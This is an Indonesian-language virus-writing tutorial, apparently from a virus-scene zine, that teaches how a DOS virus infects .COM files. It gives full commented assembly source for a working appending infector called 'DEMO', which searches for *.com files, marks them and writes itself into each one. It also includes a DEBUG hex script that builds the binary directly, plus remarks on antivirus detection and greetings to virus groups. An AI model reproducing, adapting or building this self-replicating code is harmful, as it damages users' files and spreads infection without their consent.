 */ Artikel Pertama \*

                 -= Virus Yang Menyerang File Com =-
                 -----------------------------------
                                by
                          Syvatex/NumLocK


di artikel ini kita akan membahas bagaimana caranya virus dapat menginfeksi
file Com dan menaruhkan Pengenal di virus itu sendiri.

langkahnya adalah : 1. hitung offset
                    2. memgembalikan byte-byte yang di simpan
                       supaya file yang di infeksi berjalan normal
                    3. mengeset DTA area { DTA = Disk Transfer Area }
                    4. mencari nama file yang akan di infeksi
                    5. membuka nama file --------------------
                    6. membaca 3 byte awal dari file com untuk mengetahui
                       apakah sudah tertular
                    7. tulis virus di akhir file com
                    8. tutup file
                    9. jalankan file yang asli

*/ Contoh virus Yang Menyerang File Com \*

; Virus Name :  DEMO
; Created by :  Syvatex/NumLocK
; Infect     :  File COM
; Type       :  Non - OW
; Detect     :  Avp just suspicius but Scan v4.0 detect Auspar and can Clean
; Greetz to  :  NukE,SKISM,NoMercy,VLAD,VBB, and all virii writen

  .model tiny                            
  .code                                   
            org 100h                      
  
  startvirus:
            call start
            int 20h

  Start:    mov bp,0000h            ; taruh BP = 0000h hanya untuk file ini
                                    ; untuk nilai BP yang baru lihat ******
            lea  si,[bp+old_bytes]  ;ambil 4 byte yang disimpan 
            mov  di,100h            ;letakan 4 byte di
            push di                 ;memori di=100h  ( XXXX:0100h )
            movsw                   ;pindahkan/salin
            movsw                   ;untuk melihat nya gunakan debug
  
            mov  ah,1Ah                   ; Set DTA
            lea  dx,[bp+newDTA]           ; alamat baru dari DTA 
            int  21h
  
            lea  dx,[bp+exe_mask]         ; nama file yang akan dicari
            mov  ah,4eh                   ; cari file
            mov  cx,7                     ; attribute bebas
  findfirstnext:
            int  21h                     
            jc   done_infections          

            mov  ax,3d02h                 ; Buka file untuk dibaca dan di tulis
            lea  dx,[bp+newDTA+30]        ; letak nama file DTA+30
            int  21h
            xchg ax,bx                    ; return ax = file handle
                                          ; tukarkan ax = bx

            mov  ah,3fh                   ; baca file
            lea  dx,[bp+old_bytes]        ; letakan ke variable old_bytes
            mov  cx,4                     ; sebanyak 4 byte
            int  21h
    
  check: cmp byte ptr [bp+old_bytes+3],'E'; apakah offset ke 3 sama dengan 'E'
            jz  find_next                 ; kalo sama cari lagi ah...ah

            mov  ax,4202h            ; pindahkan penunjuk pointer
            xor  cx,cx               ; ke akhir file
            cwd                      ; cwd (1 byte ) = xor dx,dx (2 bytes)            
            int  21h

            sub  ax,3                ; kurangi besar file AX = AX - 3
            mov  word ptr [bp+new_byte+1],ax  ; taruh nilai ax untuk penunjuk
                                 ; agar virus slalu di jalankan lebih dahulu

            ;*******Lihat Rutin untuk mencari nilai BP yang Baru*******
            sub  ax,2                      ; kurangi ax dengan 2
            mov  word ptr  [bp+start+1],ax ; taruh ax sebagai nilai offset baru
                                           ; di offset start+1
                                           ; BP = AX

            mov  ah,40h                    ; tulis virus
            lea  dx,[bp+start]             ; mulai alamat start
            mov  cx,heap-start             ; sebanyak cx = heap - start
            int  21h            

            mov  ax,4200h                  ; pindahkan pointer
            cwd                            ; ke awal file
            xor cx,cx
            int 21h

            mov  ah,40h                    ; tulis pengenal dan penunjuk virus
            lea  dx,[bp+new_byte]          ; 
            mov  cl,4                      ; sebanyak 4 bytes
            int  21h
  
    find_next:                           
            mov ah,3eh                   ; tutup file handle
            int 21h

            mov  ah,4fh                   ; cari file lagi
            jmp  short findfirstnext

  done_infections:
            mov  di,100h                  ; set di kelamat 100h
                                          ; cs:0100h
            jmp  di                       ; loncat ke alamat 100h
                                          ; untuk menjalankan file yang asli


  exe_mask            db '*.com',0
  old_bytes           db 0cdh,20h,0,'E'
  new_byte            db 0e9h,0,0,'E'
  heap:
  newDTA:  
  end       startvirus
;-----------POTONG DEBUG SCRIPT  DISINI-----------------
N DEMO.COM
E 100 E8 02 00 CD 20 BD 00 00 8D B6 89 01 BF 00 01 57
E 110 A5 A5 B4 1A 8D 96 91 01 CD 21 8D 96 83 01 B4 4E
E 120 B9 07 00 CD 21 72 57 B8 02 3D 8D 96 AF 01 CD 21
E 130 93 B4 3F 8D 96 89 01 B9 04 00 CD 21 80 BE 8C 01
E 140 45 74 33 B8 02 42 33 C9 99 CD 21 2D 03 00 89 86
E 150 8E 01 2D 02 00 89 86 06 01 B4 40 8D 96 05 01 B9
E 160 8C 00 CD 21 B8 00 42 99 33 C9 CD 21 B4 40 8D 96
E 170 8D 01 B1 04 CD 21 B4 3E CD 21 B4 4F EB A5 BF 00
E 180 01 FF E7 2A 2E 63 6F 6D 00 CD 20 00 45 E9 00 00
E 190 45
RCX
91
W
q

;-----Caranya  DEBUG < NAMAFILE         -------------
*/ Syvatex/NumLocK \*
;--------------sampai disini saja--------------------------

